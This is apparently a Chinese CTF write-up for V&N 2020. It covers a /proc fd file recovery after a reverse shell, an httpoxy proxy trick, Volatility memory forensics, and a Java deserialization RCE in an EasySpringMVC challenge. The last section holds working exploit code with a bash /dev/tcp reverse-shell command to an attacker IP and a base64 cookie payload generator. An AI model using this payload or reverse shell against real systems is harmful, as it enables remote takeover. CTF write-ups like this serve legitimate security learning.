V&N 2020
Checkin
利用RCE反弹shell访问fd恢复文件
文件操作命令 cp、mv、rm 底层原理
app@c26d248e698b:/proc/1$ ls fd
ls fd
ls: cannot open directory 'fd': Permission denied
app@c26d248e698b:/proc/1$ cd ..
cd ..
app@c26d248e698b:/proc$ cd 10
cd 10
app@c26d248e698b:/proc/10$ ls fd
ls fd
0
1
2
3
4
5
app@c26d248e698b:/proc/10$ cat fd/0
cat fd/0
app@c26d248e698b:/proc/10$ cat fd/3
cat fd/3
flag{5a4a0c3f-6639-4948-b0a3-bf8f51702a75}
Time Travel
httpproxy问题:
https://www.anquanke.com/post/id/84227
添加:
Proxy: 174.1.22.100:5000
会被CGI解析成HTTP_PROXY
从而能打到我们的攻击机上
if(isset($_GET['flag'])) {
$client = new Client();
$response = $client->get('http://127.0.0.1:5000/api/eligible');
$content = $response->getBody();
$data = json_decode($content, TRUE);
if($data['success'] === true) {
echo system('/readflag');
}
内存取证
这个内存取证题还蛮有意思的
首先拿到mem.raw
用volatility分析
pslist
Volatility Foundation Volatility Framework 2.6
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x829af8c0 System 4 0 101 479 ------ 0 2020-02-18 19:52:20 UTC+0000
0x83c4d948 smss.exe 280 4 2 30 ------ 0 2020-02-18 19:52:20 UTC+0000
0x83cc8030 csrss.exe 376 352 9 453 0 0 2020-02-18 19:52:20 UTC+0000
0x844e4d40 wininit.exe 432 352 3 79 0 0 2020-02-18 19:52:20 UTC+0000
0x844d9608 csrss.exe 440 424 10 311 1 0 2020-02-18 19:52:20 UTC+0000
0x84d59d40 services.exe 488 432 7 209 0 0 2020-02-18 19:52:21 UTC+0000
0x8466f030 lsass.exe 520 432 7 595 0 0 2020-02-18 19:52:21 UTC+0000
0x8466f600 lsm.exe 528 432 10 146 0 0 2020-02-18 19:52:21 UTC+0000
0x8465e3b0 winlogon.exe 536 424 4 115 1 0 2020-02-18 19:52:21 UTC+0000
0x846af568 svchost.exe 668 488 10 356 0 0 2020-02-18 19:52:21 UTC+0000
0x846c0728 svchost.exe 740 488 8 285 0 0 2020-02-18 19:52:21 UTC+0000
0x8861ead8 svchost.exe 804 488 21 467 0 0 2020-02-18 19:52:21 UTC+0000
0x846e6300 svchost.exe 860 488 23 487 0 0 2020-02-18 19:52:21 UTC+0000
0x846edb38 svchost.exe 884 488 39 988 0 0 2020-02-18 19:52:21 UTC+0000
0x847315c0 audiodg.exe 988 804 7 132 0 0 2020-02-18 19:52:21 UTC+0000
0x8475d728 svchost.exe 1060 488 15 557 0 0 2020-02-18 19:52:21 UTC+0000
0x846a4740 WUDFHost.exe 1164 860 9 202 0 0 2020-02-18 19:52:22 UTC+0000
0x847913f8 svchost.exe 1260 488 17 382 0 0 2020-02-18 19:52:22 UTC+0000
0x846a8348 spoolsv.exe 1372 488 13 300 0 0 2020-02-18 19:52:22 UTC+0000
0x84805318 svchost.exe 1432 488 20 314 0 0 2020-02-18 19:52:22 UTC+0000
0x848104a8 taskhost.exe 1480 488 10 211 1 0 2020-02-18 19:52:22 UTC+0000
0x84648560 taskeng.exe 1536 884 5 76 0 0 2020-02-18 19:52:23 UTC+0000
0x84885348 imdsksvc.exe 1720 488 3 41 0 0 2020-02-18 19:52:23 UTC+0000
0x848a3d40 coherence.exe 1760 488 6 62 0 0 2020-02-18 19:52:23 UTC+0000
0x848a8b38 prl_tools_serv 1796 488 11 160 0 0 2020-02-18 19:52:23 UTC+0000
0x848b2728 dwm.exe 1832 860 4 73 1 0 2020-02-18 19:52:23 UTC+0000
0x848c52e8 coherence.exe 1840 1760 4 40 1 0 2020-02-18 19:52:23 UTC+0000
0x848ca878 dllhost.exe 1880 488 8 97 0 0 2020-02-18 19:52:23 UTC+0000
0x848df648 prl_tools.exe 1904 1796 10 144 1 0 2020-02-18 19:52:23 UTC+0000
0x848e4578 explorer.exe 1964 1808 31 873 1 0 2020-02-18 19:52:23 UTC+0000
0x84871b10 dllhost.exe 824 488 17 204 0 0 2020-02-18 19:52:24 UTC+0000
0x8486cd40 svchost.exe 696 488 11 307 0 0 2020-02-18 19:52:24 UTC+0000
0x848b3a00 prl_cc.exe 2204 1904 32 385 1 0 2020-02-18 19:52:24 UTC+0000
0x84992d40 msdtc.exe 2536 488 15 155 0 0 2020-02-18 19:52:25 UTC+0000
0x83940728 sppsvc.exe 2792 488 4 148 0 0 2020-02-18 19:52:28 UTC+0000
0x839cab10 SearchIndexer. 2868 488 13 588 0 0 2020-02-18 19:52:30 UTC+0000
0x83c0ad40 TrueCrypt.exe 3364 3188 7 388 1 0 2020-02-18 19:52:44 UTC+0000
0x837f5d40 notepad.exe 3552 1964 2 61 1 0 2020-02-18 19:53:07 UTC+0000
0x82a7e568 iexplore.exe 3640 1964 16 468 1 0 2020-02-18 19:53:29 UTC+0000
0x847c8030 iexplore.exe 3696 3640 25 610 1 0 2020-02-18 19:53:29 UTC+0000
0x848a7030 mspaint.exe 2648 1964 18 383 1 0 2020-02-18 19:54:01 UTC+0000
0x82b8bd40 svchost.exe 1660 488 7 112 0 0 2020-02-18 19:54:01 UTC+0000
0x83bf0030 mscorsvw.exe 2908 488 7 75 0 0 2020-02-18 19:54:24 UTC+0000
0x82bf4d40 dllhost.exe 628 668 6 86 1 0 2020-02-18 19:56:22 UTC+0000
0x82bf4768 dllhost.exe 1728 668 6 81 0 0 2020-02-18 19:56:22 UTC+0000
0x83922030 DumpIt.exe 1500 1964 2 39 1 0 2020-02-18 19:56:22 UTC+0000
0x82bf3408 conhost.exe 1872 440 2 51 1 0 2020-02-18 19:56:22 UTC+0000
0x82b85b40 WMIADAP.exe 1120 884 6 91 0 0 2020-02-18 19:56:23 UTC+0000
0x82a9fb38 WmiPrvSE.exe 684 668 8 119 0 0 2020-02-18 19:56:24 UTC+0000
有个mspaint,那么一般是要dump出来用gimp等工具恢复出来里面的图像
试一下常见的宽高,然后调偏移
最后大概是这样
暂时还不知道是啥意思
看到有notepad.exe
那么试一下notepad和editbox
editbox返回
Volatility Foundation Volatility Framework 2.6
******************************
Wnd Context : 1\WinSta0\Default
Process ID : 3640
ImageFileName : iexplore.exe
IsWow64 : No
atom_class : 6.0.7600.16385!Edit
value-of WndExtra : 0x4a13b8
nChars : 0
selStart : 0
selEnd : 0
isPwdControl : False
undoPos : 0
undoLen : 0
address-of undoBuf: 0x0
undoBuf :
-------------------------
******************************
Wnd Context : 1\WinSta0\Default
Process ID : 3640
ImageFileName : iexplore.exe
IsWow64 : No
atom_class : 6.0.7600.16385!Edit
value-of WndExtra : 0x49f3d0
nChars : 60
selStart : 0
selEnd : 0
isPwdControl : False
undoPos : 0
undoLen : 0
address-of undoBuf: 0x0
undoBuf :
-------------------------
https://pan.baidu.com/share/init?surl=jAVwrRzIgW1QsLHidtzY_w
******************************
Wnd Context : 1\WinSta0\Default
Process ID : 3552
ImageFileName : notepad.exe
IsWow64 : No
atom_class : 6.0.7600.16385!Edit
value-of WndExtra : 0x177ad0
nChars : 78
selStart : 0
selEnd : 0
isPwdControl : False
undoPos : 0
undoLen : 0
address-of undoBuf: 0x0
undoBuf :
-------------------------
where is link?链接: https://pan.baidu.com/s/ 提取码: heem 复制这段内容后打开百度网盘手机App,操作更方便哦
有个度盘链接和验证码
但是复现的时候貌似么法打开了。。。。。
有iexplore.exe,可以用iehistory或者yarascan搞一下也能看到链接地址
接下来似乎是拿到TrueCrypt的密码,去解开链接下载的东西,然后一个压缩包,密码就是画图里dump出来的了
[V&N2020 公开赛]EasySpringMVC
看了一下以为要绕鉴权
结果ReadObject里有个奇怪的操作
private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
Object obj = in.readObject();
(new ProcessBuilder((String[])obj)).start();
}
这边反序列的时候说的时候把obj调用进(new ProcessBuilder((String[])obj)).start();里了
相当于可以直接RCE了
obj是从in.readObject();里面来的,查文档可以发现,in.readObject();是我们序列化时out.writeObject写入的
那就来生成一个
/* */ package com.tools;
/* */ import java.io.*;
/* */
/* */
/* */
/* */ public class Tools implements Serializable {
/* */ private static final long serialVersionUID = 1L;
/* */
/* */ public static Object parse(byte[] bytes) throws Exception {
/* 10 */ ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
/* 11 */ return ois.readObject();
/* */ }
/* */ private String testCall;
/* */ public static byte[] create(Object obj) throws Exception {
/* 15 */ ByteArrayOutputStream bos = new ByteArrayOutputStream();
/* 16 */ ObjectOutputStream outputStream = new ObjectOutputStream(bos);
/* 17 */ outputStream.writeObject(obj);
/* 18 */ return bos.toByteArray();
/* */ }
/* */
/* */ private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
/* 22 */ Object obj = in.readObject();
/* 23 */ (new ProcessBuilder((String[])obj)).start();
/* */ }
private void writeObject(ObjectOutputStream out) throws IOException,ClassNotFoundException{
String command[]={"bash","-c","bash -i>& /dev/tcp/172.16.138.142/2333 0>&1"};//执行命令 反弹Shell
out.writeObject(command);
}
/* */ }
/* Location: C:\Users\Eki\Desktop\springmvcdemo_2\WEB-INF\classes\!\com\tools\Tools.class
* Java compiler version: 8 (52.0)
* JD-Core Version: 1.0.7
*/
package com.company;
import java.util.Base64;
import com.tools.*;
public class Main {
public static void main(String[] args) {
Base64.Encoder encoder = Base64.getEncoder();
try {
Tools cinfo = new Tools();
byte[] bytes = Tools.create(cinfo);
String payload = encoder.encodeToString(bytes);
System.out.println(payload);
} catch (Exception e){
e.printStackTrace();
}
}
}
运行后将生成的payload放进cookie里就会触发了